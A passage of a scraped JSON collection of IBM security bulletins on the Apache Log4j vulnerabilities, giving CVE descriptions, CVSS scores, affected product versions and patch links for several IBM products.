Patch link \n---|---|--- \nGDE (4.0.0.6)| Guardium Cloud Key Manager (GCKM) Appliance (V1.10.1)| [https://supportportal.thalesgroup.com/csm?id=kb_article_view&amp;sys_kb_id=a0c7c50cdb13f850520c470505961948&amp;sysparm_article=KB0024988](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=a0c7c50cdb13f850520c470505961948&sysparm_article=KB0024988>) \nGDE (4.0.0.6)| Guardium Cloud Key Manager (GCKM) Appliance (V1.10)| [https://supportportal.thalesgroup.com/csm?id=kb_article_view&amp;sys_kb_id=c22619b41b55fc10e2af520f6e4bcb97&amp;sysparm_article=KB0024583](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=c22619b41b55fc10e2af520f6e4bcb97&sysparm_article=KB0024583>) \nGDE (4.0.0.5)| Guardium Cloud Key Manager (GCKM) Appliance (V1.9)| [https://supportportal.thalesgroup.com/csm?id=kb_article_view&amp;sys_kb_id=1f4ca87edbc36810520c47050596192a&amp;sysparm_article=KB0023969](<https://supportportal.thalesgroup.com/csm?id=kb_article_view&sys_kb_id=1f4ca87edbc36810520c47050596192a&sysparm_article=KB0023969>) \n \n## Workarounds and Mitigations\n\nCustomer needs to apply the patch, please refer \"Remediation/Fixes \" section for patch links.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T07:53:09", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Guardium Data Encryption (GDE) (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-29T07:53:09", "id": "5C2309A832A981E871A38D52C9E19A6D60138A5FF04933E55F3319A964A350A7", "href": "https://www.ibm.com/support/pages/node/6537486", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:32", "description": "## Summary\n\nThere are multiple Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-45046) impacting IBM Watson Machine Learning in Cloud Pak for Data which uses Apache Log4j for logging. The fix includes Apache Log4j 2.17.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Watson Machine Learning in Cloud Pak for Data| 4.0.4 \n \n\n\n## Remediation/Fixes\n\n**Affected Product(s)**| **Version(s)**| **Fixes** \n---|---|--- \nWatson Machine Learning in Cloud Pak for Data| 4.0.4| Get the latest Watson Machine Learning by upgrading to [4.0.5](<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=planning-operator-operand-versions#versions__cpd-platform> \"4.0.5\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T02:08:48", "type": "ibm", "title": "Security Bulletin: IBM Watson Machine Learning in Cloud Pak for Data is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-27T02:08:48", "id": "9A6C0D3F4E9D02D3ABB77CC1F15B5C57FED8926916549AF207B111EC9D3C5B1C", "href": "https://www.ibm.com/support/pages/node/6551316", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:07", "description": "## Summary\n\nIBM Data Risk Manager (IDRM) 2.0.6.10 and earlier is impacted by Log4j (CVE-2021-45105, CVE-2021-45046). This vulnerability has been addressed in the updated version of IDRM 2.0.6.11 which includes Apache Log4j 2.17.1. Please see remediation steps below to apply fix. All customers encouraged to act quickly to update their systems.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM DRM| 2.0.6 \n \n\n\n## Remediation/Fixes\n\nTo obtain fixes for all reported issues, customers are advised first to upgrade to v2.0.6.10, and then apply the latest FixPack 2.0.6.11. \n\n**NOTE:** The FixPack is not cumulative. So it must be applied on top of 2.0.6.10 in sequence.\n\n_Product_| _VRMF_| _APAR \n_| _Remediation / First Fix_ \n---|---|---|--- \nIBM Data Risk Manager| 2.0.6| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.1_Fixpack ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.4.1&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.2_Fixpack ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.1&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"\" )\n\n5) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n9) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n10) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n11) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.1| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.2_Fixpack ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.1&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n4) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n9) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n10) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.2| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.3_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.2&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n3) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n9) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.3| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.4_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all> \"DRM_2.0.6.4_FixPack\" )\n\n2) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n8) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.4| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.5_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.3&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n7) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.5| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.6_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.5&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n6) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.6| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.7_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.6&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n5) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.7| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.8_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.7&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n4) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.8| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.9_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.8&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n3) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.9| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.10_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.9&platform=Linux&function=all>)\n\n2) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \nIBM Data Risk Manager| 2.0.6.10| \n\n-\n\n| \n\n1) Apply [DRM_2.0.6.11_FixPack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Data+Risk+Manager&release=2.0.6.10&platform=Linux&function=all> \"DRM_2.0.6.11_FixPack\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T15:33:00", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Data Risk Manager (CVE-2021-45105, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-13T15:33:00", "id": "A3BC60725F0EAC71F9F85D52468B5D776A02B53D2F6CC6F5075461F1867C9EA8", "href": "https://www.ibm.com/support/pages/node/6540606", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:08", "description": "## Summary\n\nApache Log4j is included in WebSphere Application Server (WAS), which is distributed with IBM Stored IQ for Legal. There are multiple Apache Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45105, CVE-2021-45046) impacting IBM StoredIQ for Legal application. IBM StoredIQ for Legal uses Apache Log4j for logging. The interim fix PH42762 removes Apache Log4j from WAS.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM StoredIQ for Legal| 2.0.3 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\nFor the affected version specified above, apply [PH42762](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/StoredIQ+for+Legal&release=2.0.3.14&platform=All&function=all> \"PH42762\" ) interim 